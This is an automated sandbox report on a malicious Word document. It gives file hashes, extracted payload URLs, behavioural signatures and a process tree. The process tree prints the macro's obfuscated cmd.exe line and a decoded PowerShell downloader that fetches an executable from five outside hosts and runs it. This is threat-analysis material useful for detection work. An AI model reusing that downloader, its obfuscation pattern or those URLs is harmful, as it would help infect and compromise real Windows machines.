Analysis
max time kernel: 54s
max time network: 33s
platform: windows7_x64
resource: win7-20240708-en
resource tags: arch:x64, arch:x86, image:win7-20240708-en, locale:en-us, os:windows7-x64, system
submitted: 22-11-2024 02:14
Behavioral task: behavioral1
Sample: fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f.doc
Resource: win7-20240708-en

Behavioral task: behavioral2
Sample: fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f.doc
Resource: win10v2004-20241007-en
General
Target: fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f.doc
Size: 62KB
MD5: 8cf2a878780f9f16e7dd5ce997ee9a97
SHA1: 0f5c26827acc179f7619b847a21de4e63b7bddce
SHA256: fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f
SHA512: e0ba84a3667ee46a042b167a624dcf3c14c2de28cba94dcba1afb6f035c6b52eddeec26a02fff4e2b4ef1ed9fea330169a302d979b7563c37db7903354e1b13d
SSDEEP: 768:8ooSooooUatoXoooonooqoooUoooooIooUpJcaUitGAlmrJpmxlzC+w99NBD3y6L:QptJlmrJpmxlRw99NB7yZhERepNiqwC
Malware Config
Extracted
http://tomas.datanom.fi/testlab/w0qi46LyvZ
http://www.plasdo.com/MNXfUEtpo
http://vinastone.com/m3qQf5sLVY
http://vaarbewijzer.nl/D50JpVAsc0
http://ruforum.uonbi.ac.ke/wp-content/uploads/afZG2WrC
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
  description: Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process
  pid: 2108, pid_target: 464, Process: cmd.exe, procid_target: 29

Blocklisted process makes network request (3 IoCs)
Processes:
  flow: 5, pid: 2816, Process: powershell.exe
  flow: 8, pid: 2816, Process: powershell.exe
  flow: 9, pid: 2816, Process: powershell.exe

An obfuscated cmd.exe command-line is typically used to evade detection. (1 IoC)
Processes:
  pid: 2108, Process: cmd.exe

Drops file in Windows directory (1 IoC)
Processes:
  description: File opened for modification, ioc: C:\Windows\Debug\WIA\wiatrace.log, Process: WINWORD.EXE

System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description: Key opened, ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, Process: WINWORD.EXE
  description: Key opened, ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, Process: cmd.exe
  description: Key opened, ioc: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, Process: powershell.exe

Office loads VBA resources, possible macro or embedded object present

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
  pid: 464, Process: WINWORD.EXE

Suspicious behavior: EnumeratesProcesses (1 IoC)
Processes:
  pid: 2816, Process: powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoC)
Processes:
  description: Token: SeDebugPrivilege, pid: 2816, Process: powershell.exe

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes:
  pid: 464, Process: WINWORD.EXE
  pid: 464, Process: WINWORD.EXE

Suspicious use of WriteProcessMemory (12 IoCs)
Processes:
  description: PID 464 wrote to memory of 2108, pid: 464, Process: WINWORD.EXE, procid_target: 30 (4 identical entries)
  description: PID 2108 wrote to memory of 2816, pid: 2108, Process: cmd.exe, procid_target: 33 (4 identical entries)
  description: PID 464 wrote to memory of 2736, pid: 464, Process: WINWORD.EXE, procid_target: 35 (4 identical entries)
Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE (depth 1)
Command line: "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fd15363835636b0455cd31ed7860dfbc3d06b14cc172e02d68afd26f3962a10f.doc"
PID: 464
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\cmd.exe (depth 2)
  Command line: cmd /V/C"s^e^t NnQ=^ ^ ^ ^ ^ ^ ^ ^ ^}}{hct^ac^};kaerb;hZP^$ ^me^tI-^ekovn^I;)^h^ZP$ ^,s^o^j^$(^e^liFdaoln^w^o^D^.rV^S^$^{yr^t{)R^h^l$^ ni^ ^soj^$(^hcaerof^;^'e^xe.^'^+^fo^O^$+^'\^'^+c^il^bu^p:vn^e^$=hZP$;^'^23^8^'^ ^= ^f^o^O^$^;)'@^'(t^i^lpS^.^'Cr^W2G^Z^fa/^sd^ao^l^pu/tnetnoc^-^p^w/^ek.ca^.ibn^ou.^m^urofur//^:pt^t^h@0c^sAV^p^J05^D/^ln.r^e^z^j^iw^e^br^aav//:^ptt^h@^YVLs5fQq3^m/moc^.en^o^t^saniv//^:p^t^t^h@^o^pt^EU^fXN^M/moc^.^o^ds^alp.^www//^:^p^tth^@^Zvy^L^64^iq^0^w/b^alt^se^t/^i^f^.m^ona^t^ad^.^s^amo^t//^:^ptth^'^=Rh^l$^;^tnei^lC^be^W^.teN tc^e^jb^o-^wen=rVS$^ ^l^leh^sr^ew^op&&^f^or /^L %^H in (40^5^;^-1;0)^d^o ^s^e^t k^h=!k^h!!NnQ:~%^H,1!&&^if %^H=^=^0 c^a^l^l %k^h:^~^-^4^06%"
  PID: 2108
  - Process spawned unexpected child process
  - An obfuscated cmd.exe command-line is typically used to evade detection.
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3)
    Command line: powershell $SVr=new-object Net.WebClient;$lhR='http://tomas.datanom.fi/testlab/w0qi46LyvZ@http://www.plasdo.com/MNXfUEtpo@http://vinastone.com/m3qQf5sLVY@http://vaarbewijzer.nl/D50JpVAsc0@http://ruforum.uonbi.ac.ke/wp-content/uploads/afZG2WrC'.Split('@');$Oof = '832';$PZh=$env:public+'\'+$Oof+'.exe';foreach($jos in $lhR){try{$SVr.DownloadFile($jos, $PZh);Invoke-Item $PZh;break;}catch{}}
    PID: 2816
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

  C:\Windows\splwow64.exe (depth 2)
  Command line: C:\Windows\splwow64.exe 12288
  PID: 2736